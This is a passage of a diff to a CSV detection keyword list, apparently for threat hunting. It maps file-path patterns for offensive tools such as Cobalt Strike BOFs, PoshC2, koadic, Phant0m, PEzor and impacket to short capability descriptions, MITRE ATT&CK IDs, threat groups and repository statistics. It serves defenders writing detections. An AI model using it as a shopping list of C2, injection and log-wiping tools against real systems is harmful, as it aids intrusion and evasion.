T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/PEzor.sh 
*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/PEzor/inject.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*/pfsense_clickjacking*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/pfsense_clickjacking*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/pgsql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Phant0m.git*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*/phant0m-exe*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" 
@@ -4711,7 +4756,7 @@ "*/phishing/password_box*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/PhishingServer/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/pid:1337 */dll:*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" -"*/ping6.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/ping6.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/PipeViewer.exe*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer.git*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer.sln*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" 
@@ -4721,55 +4766,55 @@ "*/pivotnaccilib*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*/pjl-info-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "*/pjl-ready-message.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/pkg/state/sudoers.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/pkg/state/sudoers.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/PKINITtools*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*/Plazmaz/LNKUp*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/PoC/PrivilegeEscalation*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" "*/POC_DLL.vcxproj*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/PoC-CVE-2023-21554*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","","N/A","","","" 
-"*/poisoners/*.py","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/poisoners/*.py","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/pop3-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pop3-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pop3-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/popCalc.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/popCalc.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). 
BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/PortBender/*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" -"*/portscan.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*/portscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/portscan.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 
- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/portscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" "*/port-states.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/POSeidon.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*/posh.key*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - 
T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh.key*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/posh.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*/PoshC2*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. 
DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/poshc2-*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - 